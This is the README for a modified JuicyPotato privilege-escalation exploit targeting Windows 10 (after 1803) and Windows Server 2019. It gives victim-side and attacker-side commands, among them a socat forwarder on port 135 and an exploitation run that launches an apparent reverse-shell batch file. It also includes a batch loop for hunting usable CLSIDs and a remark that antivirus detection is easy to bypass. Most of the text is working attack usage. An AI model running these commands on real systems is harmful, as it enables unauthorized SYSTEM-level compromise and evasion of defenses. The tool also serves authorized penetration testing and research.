JuicyPotato for Win10 > 1803 & Win Server 2019
Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/
Disclaimer:
This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSIDs and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) on newer Windows 10 and Windows Server 2019 platforms.
(I know, this version is caught by Defender and other AVs, but with some modifications in the code it's easy to bypass)
A mandatory prerequisite is the ability to redirect traffic for port 135 to a forwarder machine under your control.
Feel free to improve the code, I was too lazy for this kind of stuff.
For testing a CLSID:
juicy_2 -z -x [ip of socat listener] -l [fake OXID resolver port] -n [local RPC server port] -c [CLSID to test]
Example:
on victim:
juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
For exploitation:
on victim:
juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
Hunting for juicy CLSIDs with a stupid batch:
@echo off
REM clsid.list holds one CLSID per line; each is tested in -z (test) mode and the result appended to out.txt
FOR /F %%i IN (clsid.list) DO (
.\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt
REM short pause so the previous test releases its local ports before the next one starts
timeout /t 2
)